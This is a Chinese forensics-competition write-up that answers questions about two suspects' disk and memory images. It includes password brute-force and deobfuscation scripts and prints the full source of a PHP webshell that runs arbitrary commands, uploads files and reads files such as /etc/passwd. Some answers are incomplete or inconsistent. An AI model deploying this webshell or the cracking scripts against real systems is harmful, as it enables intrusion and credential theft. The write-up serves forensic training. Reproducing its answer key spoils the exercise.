刘洋的计算机：

检材解密：VeZeTANHVkklvVljLnpOYeBwCJFYD5tFpf67f5kNuqP1G5jj

用到镜像文件：

刘洋：

文件	类型	用途
liuyang_pc.E01	磁盘镜像（EnCase 格式）	静态文件分析、已删除文件恢复、BitLocker 加密卷结构
ly-memdump.mem	内存镜像	提取运行时密钥、网络连接、进程注入、恶意代码、BitLocker VMK

黄志远：

一个PC镜像

碎碎念

这个是怎么做得到一个VC加密按不同方式解密的出来不同的加密文件的！！！好神奇，拓宽视野了

其实这个计算机难度集中在了两个地方。liuyang的E01主要是难在VC密钥有两种，每种解开都是不同的东西，huangzhiyuan的则难在找到渗透RAR并打开，这两个解决了其他的题都是读读数据这种，还有语文文字题（T_T读不懂题）

liuyang.E01

1

分析刘洋liuyang_pc.E01检材，提取磁盘镜像SHA1值的前6位？[答案格式：字母小写]

5bc418

2

分析刘洋liuyang_pc.E01检材，计算机系统Build版本为？[答案格式：19000]

26100

3

分析刘洋liuyang_pc.E01检材，计算机最后一次正常关机的时间为？UTC+0[答案格式：2025-05-06-09:00:00]

2026-04-20-16:25:35

而注意到；

所以时间减去8小时

4

分析刘洋liuyang_pc.E01检材，计算机网卡的MAC地址为？[答案格式：00-0B-00-A0-00-00]

00-50-56-30-26-1C

5

分析刘洋liuyang_pc.E01检材，分析机主是从那里下载的typora？[答案格式：阿里云]

蓝奏云

在Chrome的下载记录里看到该软件

虽然网页不可用，但是可以看到这是蓝奏云的logo

6

分析刘洋liuyang_pc.E01检材，刘洋在2026-04-19 13:46:01（UTC +0）曾访问过百度云盘，请给云盘的打开密码？[答案格式：11aa]

48gy

注意UTC +0，所以我们找的时间要加8，时间上搜索

问云盘密码，大概率都是在浏览器的聊天记录里

得到48gy

7

分析刘洋liuyang_pc.E01检材，请给出刘洋管理pve集群所用的端口号？[答案格式:8000]

8006

8

分析刘洋liuyang_pc.E01检材，请给出刘洋登录理财网站所使用的密码？[答案格式:password]

admin123

翻浏览器记录可以发现保存过的密码admin123

9

分析刘洋liuyang_pc.E01检材，请给出理财网站的IP地址？[答案格式:127.0.0.1]

192.168.0.70

这个题我原来的做法：这个理财软件我们在上道题已经知道了URL，在仿真里面输入命令，查看DNS日志

nslookup 3w.jlzb.vip

输出的是

C:\Users\刘洋>nslookup 3w.jlzb.vip
DNS request timed out.
    timeout was 2 seconds.
服务器:  UnKnown
Address:  192.168.2.1

DNS request timed out.
    timeout was 2 seconds.
DNS request timed out.
    timeout was 2 seconds.
DNS request timed out.
    timeout was 2 seconds.
DNS request timed out.
    timeout was 2 seconds.
*** 请求 UnKnown 超时

192.168.2.1 只是本地路由器的地址，不是目标 IP。

正解：

查看一下本地hosts文件

192.168.0.70

知识点：C:\Windows\System32\drivers\etc\hosts 是本地静态 DNS 映射文件，优先级高于外部 DNS 查询。

10

分析刘洋liuyang_pc.E01检材，请给出计算机内Bitlocker加密分区恢复密钥的前6位？[答案格式:6位数字]

560615-577522-342881-216865-242561-312356-584837-421597

这里拿内存镜像爆破Bitlocker密码

得到密码 560615-577522-342881-216865-242561-312356-584837-421597

11

分析刘洋liuyang_pc.E01检材，找出VC加密容器的密钥文件，给出该密钥文件的绝对路径？[答案格式:D:\ABC\123\测试.txt]

D:\BaiduNetdiskDownload\无标题.png

首先从12题题目里面可以猜出这个文件是图像

解密bitlocker的分区：

在D:\BaiduNetdiskDownload看到了一个无标题的PNG

再观察到电脑自带的图片里面有个一模一样的

猜测可能存在隐写

放到随波逐流里边发现果然存在高隐写

这里已经明确说明了VC容器密钥文件

所以得到答案：”D:\BaiduNetdiskDownload\无标题.png”

12

接上题，该VC加密容器的密钥文件的图像高度是多少像素？[答案格式：1345]

值得注意的是这里问的图像高度是高度修复后的图像高度，比赛的时候这里错了T_T

所以是答案是1080

13

分析刘洋liuyang_pc.E01检材，请给出团队重要信息加密保存的软件名？[答案格式：abc123]

1Password

再下载里面找到了1password，但是需要密码

在上面的压缩包里可以找到提示

说明这就是个团队重要信息加密保存的软件

14

分析刘洋liuyang_pc.E01检材，该软件的保险库文件名为什么？[答案格式：abc.abc]

liuyang.opvault

在文档处还看到了一个1Password的文件夹，打开发现是软件的保险库

opvault 是 1Password 密码管理器 的本地加密密码库文件格式。

15

分析刘洋liuyang_pc.E01检材，该软件的保险库文件打开密码是什么？[答案格式：124@password]

liuyang@6419

根据压缩包的提示，来爆破一下密码，分析liuyang.opvault编写脚本

import hashlib
import hmac
import base64
import struct
import sys
import time
from multiprocessing import Pool, cpu_count

# OPVault 密钥参数
SALT = base64.b64decode("IeURd51uAYC1eLekU4BwFA==")
ITERATIONS = 100000

# OPVault 中的 overviewKey 和 masterKey（Base64 编码）
OVERVIEW_KEY_B64 = "b3BkYXRhMDEAAAAAAAAAACDcPhy5RqzGti3mEraiflCWM3tkcTXdKYimn0yGOpegf5ECqqovRBauxoeTlU7fCZRy0zmIOuhcHsNnVx8bYs6u+HUJBpgdVJjqAnMLYIHMlbhxNcC+HMJdVmYinkBuM3Gop9N9XxK08K/mENTbWQfYiBLEj91LgxkCRobA3pKh"
MASTER_KEY_B64 = "b3BkYXRhMDEAAQAAAAAAAGfym+bTedJNHPrsp1DtSrH4iu7nA3lMUHzuq1H49jlwIvSES6b55ZGNZHA0xtyJgifKgDgc82rEOJLNzSg4Xl+qaGCk33/tJmEZWS6r7Ef+wSErsxNcUYQxVHkaWQtbofQ8vif+46dYXBGfTiT5a/JEQU2X6bn2Snd5jkOSz62sPQcuHYwJ1lFxLv4WYRWROVKMvVA4b0ByNrjTmfUHrSuPv3JuBNfiLXX69LvVPW8EdznhnZG4BlU1+m3ZCZr2HST9+04JMhFJhj0UmhO07nijbUIvcDxeqJoeznyZ1CC6eocrQlvyv2EIAOMxcMmSuCGY2CMw+MPCdlklnLEdaULfhgEEaNHfWnpFFnVql5P5B1xZOHP80SW9qzmRmzoxQ/l7tOP7XEGld2vwHQlS+Smrzp2XVDRAi8yDVMH4rmJS"

# 解码密钥数据
overview_key_raw = base64.b64decode(OVERVIEW_KEY_B64)
overview_expected_hmac = overview_key_raw[-32:]      # 最后 32 字节是 HMAC
overview_hmac_input = overview_key_raw[:-32]          # 前面是 HMAC 输入数据

master_key_raw = base64.b64decode(MASTER_KEY_B64)
master_expected_hmac = master_key_raw[-32:]
master_hmac_input = master_key_raw[:-32]


def try_password(password):
    """尝试单个密码，使用 PBKDF2-SHA512 派生密钥并验证 HMAC"""
    # PBKDF2 派生 64 字节密钥
    derived = hashlib.pbkdf2_hmac(
        'sha512', 
        password.encode('utf-8'), 
        SALT, 
        ITERATIONS, 
        dklen=64
    )
    
    # 后 32 字节作为 HMAC 密钥
    mac_key = derived[32:64]
    
    # 验证 overviewKey 的 HMAC
    computed = hmac.new(mac_key, overview_hmac_input, hashlib.sha256).digest()
    if hmac.compare_digest(computed, overview_expected_hmac):
        return password
    
    # 验证 masterKey 的 HMAC
    computed2 = hmac.new(mac_key, master_hmac_input, hashlib.sha256).digest()
    if hmac.compare_digest(computed2, master_expected_hmac):
        return password
    
    return None


def try_batch(start):
    """批量尝试密码：liuyang@0000 ~ liuyang@9999"""
    for i in range(start, min(start + 50, 10000)):
        password = f"liuyang@{i:04d}"
        result = try_password(password)
        if result:
            return result
    return None


if __name__ == '__main__':
    print(f"[*] OPVault Brute Force - liuyang@0000 to liuyang@9999")
    print(f"[*] PBKDF2-SHA512, {ITERATIONS} iterations")
    print(f"[*] Using {cpu_count()} CPU cores")
    print(f"[*] Starting...")
    
    start_time = time.time()
    batches = list(range(0, 10000, 50))
    
    with Pool(processes=cpu_count()) as pool:
        for idx, result in enumerate(pool.imap_unordered(try_batch, batches)):
            if result:
                elapsed = time.time() - start_time
                print(f"\n[+] PASSWORD FOUND: {result}")
                print(f"[+] Time elapsed: {elapsed:.1f} seconds")
                pool.terminate()
                sys.exit(0)
            
            # 每处理 20 个批次打印进度
            if idx % 20 == 0:
                elapsed = time.time() - start_time
                progress = (idx * 50) / 10000 * 100
                print(f"[*] Progress: {progress:.1f}% ({idx*50}/10000) - {elapsed:.1f}s", end='\r')
    
    elapsed = time.time() - start_time
    print(f"\n[-] Password not found in range 0000-9999 ({elapsed:.1f}s)")

[*] OPVault Brute Force - liuyang@0000 to liuyang@9999
[*] PBKDF2-SHA512, 100000 iterations
[*] Using 32 CPU cores
[*] Starting...
[*] Progress: 60.0% (6000/10000) - 48.6s
[+] PASSWORD FOUND: liuyang@6419
[+] Time elapsed: 49.8 seconds

得到密码liuyang@6419

16

分析刘洋liuyang_pc.E01检材，请给出用户刘洋的开机密码？[答案格式：p@ssw0rd123]

6yang@2o26

用密码打开：

复制出来：6yang@2o26

17

分析刘洋liuyang_pc.E01检材，请给出pve服务器的管理密码？[答案格式：p@ssw0rd123]

pgscup2o@6

在保险库里面找到PVE然后编辑打开可以看到密码

18

分析刘洋liuyang_pc.E01检材，找出计算机内的脚本加密工具，给出该加密工具的SHA1的前6位？[答案格式：字母小写]

7860dc

到这里已经不知道怎么往后走了，所以尝试用唯一还没有开通的路：VC容器

在回收站里面找到：

在百度网盘的下载文件夹找到加密容器（这个东西有3G，很不正常）

用VC挂载一下，把密码 ‘ 8687f7d845649e03d02d4ff1f36ec952 ‘，pim2026全都挂上

得到；

这里没有东西，用修复过高的VC密钥+pim2026来解密

计算hash：

19

分析刘洋liuyang_pc.E01检材，该脚本加密工具在进行脚本加密时，最后一层是进行什么操作？[答案格式:字符替换]

十六进制转换

打开脚本就可以看到

20

分析刘洋liuyang_pc.E01检材，请解密该脚本加密工具加密的文件database.php.obf，给出该文件内的数据库密码？[答案格式:p@ssw0rd123]

pgscup@o26

根据加密写出解密：

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import sys
import base64

XOR_KEY = 0x5A
BASE64_TABLE = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
CUSTOM_TABLE = "ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba9876543210+/"


def xor_decrypt(data):
    result = []
    for i, c in enumerate(data):
        result.append(chr(ord(c) ^ (XOR_KEY + i) % 256))
    return ''.join(result)


def char_swap_decode(data):
    trans = str.maketrans(CUSTOM_TABLE, BASE64_TABLE)
    return data.translate(trans)


def deobfuscate(data):
    step4 = bytes.fromhex(data).decode('utf-8')
    step3 = char_swap_decode(step4)
    step2 = base64.b64decode(step3).decode('utf-8')
    step1 = xor_decrypt(step2)
    return step1


def decrypt_file(input_path, output_path):
    with open(input_path, 'r', encoding='utf-8') as f:
        content = f.read()
    deobfuscated = deobfuscate(content)
    with open(output_path, 'w', encoding='utf-8') as f:
        f.write(deobfuscated)
    print("[OK] %s -> %s" % (input_path, output_path))


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("用法: python decrypt_tool.py <输入文件> <输出文件>")
        sys.exit(1)
    decrypt_file(sys.argv[1], sys.argv[2])

运行得到：

- 文件 : C:\Users\q1388\Desktop\database.php
- 数据库类型 : MySQL
- 主机 : 127.0.0.1:3306
- 数据库名 : jinqin
- 用户名 : root
- 密码 : pgscup@o26

21

分析刘洋liuyang_pc.E01检材，找出刘洋计算机内的交易信息.rar，给出该文件的打开密码？[答案格式：p@ssw0rd123]

pgscup@9541

拿最开始挂载VC得到的密码进行导出这个rar

拿passwarekit爆破得到密码：pgscup@9541

22

分析刘洋liuyang_pc.E01检材，找出刘洋计算机内刘桂荣的身份证号码？[答案格式：5…..1]

rar里面全是表格，直接搜索

搜出来三个。。。

420100194707075594
420100200106295186
500000196606302245

有三个….不知道答案选哪个

ly-memdump.mem

23

分析刘洋ly-memdump.mem镜像，给出用户刘洋的NT哈希值？[答案格式：数字字母组合，字母小写]

876dfe7bd78730b7b0baaf451414de8e

24

分析刘洋ly-memdump.mem镜像，给出1Password密码管理器的数据库文件名？[答案格式：123ABc.abc]

1Password10.sqlite

在lovelymem的文件搜索里面搜索1Password

知识点：

文件名	说明
1password.sqlite	主数据库文件（最常见）
B5.sqlite	1Password 账户数据库（B5 指 1Password 的云端服务架构代号）
1password10.sqlite	较新版本的数据库
op.sqlite	1Password CLI 工具的数据库

25

分析刘洋ly-memdump.mem镜像，1Password在VeraCrypt启动后约多少分钟启动？[答案格式：123]

2

进程列表搜索VeraCrypt

再搜1Password

(这里的createTime指的是进程创建的时间，也就是exe的启动)

相减即可得到答案2

黄志远PC.E01

26

分析黄志远PC.E01镜像，黄志远使用的ai agent的名称是什么？[答案格式：www]

hermes

（这里需要经验积累，Linux没有hermes这个命令）

27

分析黄志远PC.E01镜像，黄志远使用的模型api后4位是什么？[答案格式：abcd]

PC.E01/分区2/home/kali/.hermes/state.db

也可以用DBbrowser看

完美！我已经成功更新了：

1. **DeepSeek API密钥**：已更新为 `sk-dfesagheoghjopghjihgioa`
2. **Discord Bot Token**：已更新为 `dfjaoegjhoegeasgoeihgioengoeng`

配置更新完成！现在Hermes Agent将使用新的API密钥连接到DeepSeek，并使用新的Discord Bot Token连接到Discord。

**注意**：为了让更改生效，你可能需要重启Hermes服务（如果它正在运行）。你可以使用以下命令重启：

```bash
hermes restart
```

或者如果使用了systemd服务：
```bash
systemctl --user restart hermes-gateway
```

更新完成！

28

请分析黄志远PC.E01镜像中的渗透.rar文件，分析黄志远PC.E01镜像，黄志远总共攻击了多少台主机？[答案格式：123]

16

在目录里面找到一个加密的RAR

在kali/ 渗透密码里面找到一堆图片，显然这是个拼图部分

对着reference.png进行拼图（这里采用montage+gaps自动排序的方法）

magick montage patch_*.png -tile 20x25 -geometry +0+0 flag.png

（此处可以瞪眼法出密码）整体像素：600*1025，图片碎片像素:30*41,得到20列*25行

（gaps做法，这里是自己的gaps.py）

python gaps.py run 1.png 2.png --size=30 --generations=50 --population=1000 --debug

找到密码；

今晚去杀鬼

打开压缩包，得到渗透报告

29

请分析黄志远PC.E01镜像中的渗透.rar文件，反编译exploit二进制文件发现其调用了setuid()、setgid()和system(“/bin/bash”)，该程序的源文件编译前名称是什么？[答案格式：xxx.c]

exploit.c

用Ida打开，反编译main函数，发现调用这些函数

发现是C语言调用的函数，文件是C语言

放到kali里面用string提取

提取字符串 ‘ strings exploit '看到两个.c文件

特征	crtstuff.c	exploit.c
来源	GCC 编译器内置	用户编写
作用	C 运行时初始化（所有 C 程序都有）	程序的实际业务逻辑
出现位置	任何 GCC 编译的 ELF 文件都会出现	只有这个特定程序才有
可辨识度	通用、标准	与程序功能直接相关

所以得到答案

30

请分析黄志远PC.E01镜像中的渗透.rar文件，Webshell 功能逻辑研判观察 file_shell.php 的源码，若攻击者请求 ?download=/etc/passwd，程序执行的核心函数是什么？[答案格式：func()]

readfile()

打开代码：

<?php
if(isset($_GET['download'])) {
    $file = $_GET['download'];
    if(file_exists($file)) {
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="'.basename($file).'"');
        readfile($file);               《-------------------------发现此处关键核心函数!!!!!!!
        exit;
    }
}

if(isset($_FILES['file'])) {
    $target = basename($_FILES['file']['name']);
    if(move_uploaded_file($_FILES['file']['tmp_name'], $target)) {
        echo "File uploaded: $target<br>";
    }
}

if(isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>
<form method="post" enctype="multipart/form-data">
<input type="file" name="file">
<input type="submit" value="Upload">
</form>
<form method="get">
<input type="text" name="cmd" placeholder="Command">
<input type="submit" value="Execute">
</form>

31

请分析黄志远PC.E01镜像中的渗透.rar文件，Nikto扫描结果发现通过发送超长斜杠序列可以探测目录列举漏洞，该漏洞对应的CVE编号是什么？[答案格式：CVE-XXXX-XXXX]

CVE-2002-1078

".\PGS计算机部分\渗透\pentest-lab\nikto_scan.txt.txt"

下图是最开始错误做法，题目写的是通过超长///的CVE，所以应该是后面那个CVE

32

请分析黄志远PC.E01镜像中的渗透.rar文件，SQLite 数据库结构分析在 users 表的定义中，id 字段使用了 AUTOINCREMENT。这意味着什么？[答案格式：SQL_KEYWORD]

AUTOINCREMENT

做这个题的时候没有读懂意思，跟着题目一遍一遍来，在渗透报告表中可以找到

AUTOINCREMENT是SQLite的关键字

确保id字段自动递增且永不重用已删除的ID值

与单纯的PRIMARY KEY不同，AUTOINCREMENT保证ID严格递增

所以这意味着 id 字段的值会自动生成，且严格单调递增、永不重复，常用于主键（如用户 ID、订单号等需要唯一标识的场景）。

因为本人感觉语文理解上很吃力，所以这个地方放个ai解释

33

请分析黄志远PC.E01镜像中的渗透.rar文件，Webshell 命令执行参数若要利用 file_shell.php 获取当前系统的用户权限，正确的 URL 参数构造是什么？[答案格式：cmd=xxx]、

cmd=id

if(isset($_GET['cmd'])) {
    system($_GET['cmd']);
}

Linux系统中id 命令用于显示当前用户或指定用户的身份标识信息，包括用户 ID、组 ID 等。这些 ID 是 Linux 权限划分的基础。（值得注意的是ID是一种命令，uid/gid/groups这些是信息）

Linux 权限三层结构：
1. 所有者 (Owner) → uid 决定

2. 所属组 (Group) → gid 决定

3. 其他人 (Others) → 非 uid/gid 用户

UID 值	用户	权限级别
0	root	超级管理员，系统最高权限
1-999	系统用户	运行系统服务，权限受限
1000+	普通用户	日常操作，默认只能访问自己的文件

34

请分析黄志远PC.E01镜像中的渗透.rar文件，API 端口风险判定8000端口运行的技术组件是什么？[答案格式：XxxYyy]

FastApi

在通讯录管理系统漏洞清单.md中找到开放端口信息

35

请分析黄志远PC.E01镜像中的渗透.rar文件，数据库存储安全性评估users 表的密码存储存在什么安全隐患？[答案格式：CVE-XXXX-XXXX]

CVE-2026-0005

渗透测试报告_192.168.61.135.md

36

请分析黄志远PC.E01镜像中的渗透.rar文件，文件上传漏洞利用条件利用 upload.php 上传漏洞后，攻击者利用 Webshell 前最关键的一步是什么？[答案格式：xxx/

uploads/

在通讯录管理系统漏洞清单.md

37

请分析黄志远PC.E01镜像中的渗透.rar文件，根据通讯录管理系统漏洞清单，CVE-2026-0003（无限制文件上传漏洞）的CVSS评分是多少？[答案格式：1.2]

8.8

38

请分析黄志远PC.E01镜像中的渗透.rar文件，根据file_shell.php源码，文件上传功能使用哪个PHP函数将临时文件移动到目标路径？[答案格式：php_func]

move_uploaded_file

if(isset($_FILES['file'])) {
    $target = basename($_FILES['file']['name']);
    if(move_uploaded_file($_FILES['file']['tmp_name'], $target)) {
        echo "File uploaded: $target<br>";
    }
}

39

请分析黄志远PC.E01镜像中的渗透.rar文件，Web 目录遍历隐患uploads/ 目录启用目录列表功能通常由哪个组件控制？[答案格式：apache_opt]

apache_Indexes

在漏洞清单中可以看到

Apache通过Options指令中的Indexes选项控制目录列表的开启  

Apache 选项	作用
Indexes	目录列表
FollowSymLinks	允许符号链接
Includes	允许 SSI
ExecCGI	允许 CGI 执行
MultiViews	内容协商

40

请分析黄志远PC.E01镜像中的渗透.rar文件，敏感凭据深度关联在 address_book.db 中，管理员密码 Str0ngP@ssw0rd2026! 是什么角色？[答案格式：SQL_DEFAULT]

按照题目打开db

41

请分析黄志远PC.E01镜像中的渗透.rar文件，数据规模与风险评估遭受泄露的个人联系人信息条数大约为多少？[答案格式：12345]

15000

通讯录管理系统漏洞清单中可以看到

42

请分析黄志远PC.E01镜像中的渗透.rar文件，系统运行权限分析Web服务器运行的用户身份是什么？[答案格式：xxx-xxx]

www-data

依旧这个md里面可以找到

43

请分析黄志远PC.E01镜像中的渗透.rar文件，命令行注入漏洞识别验证 tools.php 命令执行漏洞时，哪个命令返回了uid的值？[答案格式：cmd]

id

这个md里面搜索tools.php可以快速找到

44

请分析黄志远PC.E01镜像中的渗透.rar文件，数据库物理路径获取攻击者通过 generate_data.php 得知数据库在服务器上的绝对物理路径是什么？[答案格式：/xxx/xxx/xxx.db]

/var/www/html/address_book.db

渗透测试报告_192.168.61.135.md里面

45

请分析黄志远PC.E01镜像中的渗透.rar文件，Webshell 下载参数逻辑源码中通过设置哪个 Header 实现浏览器自动弹出下载框？[答案格式：Content-xxx]

Content-Disposition

因为这里涉及到header伪造，所以我们去程序里面找

在file-shell.php里边可以看到

46

请分析黄志远PC.E01镜像中的渗透.rar文件，身份验证策略评估系统中存在的弱密码策略漏洞不包括哪项？[答案格式：user/pass]

admin/Str0ngP@ssw0rd2026!

根据“弱密码”漏洞清单里面

然后之前的db里面可以看到非弱密码的Str0ngP@ssw0rd2026!，对应的是admin

47

请分析黄志远PC.E01镜像中的渗透.rar文件，API 环境交互日志价值未授权访问8000端口日志接口，最可能导致哪类敏感信息泄露？[答案格式：/api/xxx]

/api/logs

（同34题）

48

请分析黄志远PC.E01镜像中的渗透.rar文件，攻击路径逻辑推演攻击者获取持久访问权限的最典型方式是什么？[答案格式：xxx.php]

file_shell.php

首先目前只看到了一个php文件，可以直接勇敢者游戏

其次，在渗透测试报告里面：

49

请分析黄志远PC.E01镜像中的渗透.rar文件，漏洞 CVE 编号识读被标识为未授权命令执行漏洞的虚拟CVE编号是什么？[答案格式：CVE-XXXX-XXXX]

CVE-2026-0002

渗透报告里面可以找到

50

请分析黄志远PC.E01镜像中的渗透.rar文件，系统修复优先级研判24小时紧急加固中，哪项不属于立即修复级别？[答案格式：ABC]

WAF

在漏洞清单里面搜索“修复建议优先级”

51

请分析黄志远PC.E01镜像中的渗透.rar文件，管理员凭据有效性验证利用管理员密码，攻击者在哪个页面时才能生效？[答案格式：xxx.php]

tools.php

在这个清单的攻击链里

52

请分析黄志远PC.E01镜像中的渗透.rar文件，本系统使用的后端数据库技术是什么？[答案格式：DB_name]

SQLite

在漏洞清单里查看系统信息

53

请分析黄志远PC.E01镜像中的渗透.rar文件，Webshell 目录处理逻辑文件上传功能中，源码将上传后的文件命名为什么？[答案格式：$_xxx]

$_FILES['file']['name']

看到$_XXX，是PHP里面的格式，所以查看flie_shell.php文件

if(isset($_FILES['file'])) {
    $target = basename($_FILES['file']['name']);
    if(move_uploaded_file($_FILES['file']['tmp_name'], $target)) {
        echo "File uploaded: $target<br>";
    }
}

部分	含义
$_FILES['file']	PHP 超全局数组，接收上传文件的信息
['name']	获取上传文件的原始文件名（如 shell.php）
basename()	提取路径中的文件名部分，去掉目录路径
$target	最终保存的目标文件名

54

请分析黄志远PC.E01镜像中的渗透.rar文件，目标系统运行的 Apache 具体版本号是什么？[答案格式：x.x.xx]

在漏洞清单里面

55

请分析黄志远PC.E01镜像中的渗透.rar文件，根据通讯录管理系统漏洞清单，CVE-2026-0001（敏感信息泄露漏洞）的CVSS评分是多少？[答案格式：1.2]

9.8

56

请分析黄志远PC.E01镜像中的渗透.rar文件，攻击者最终获取了什么角色的权限？[答案格式：xxx-xxx]

www-data
在渗透测试报告里面

至此，计算机部分-完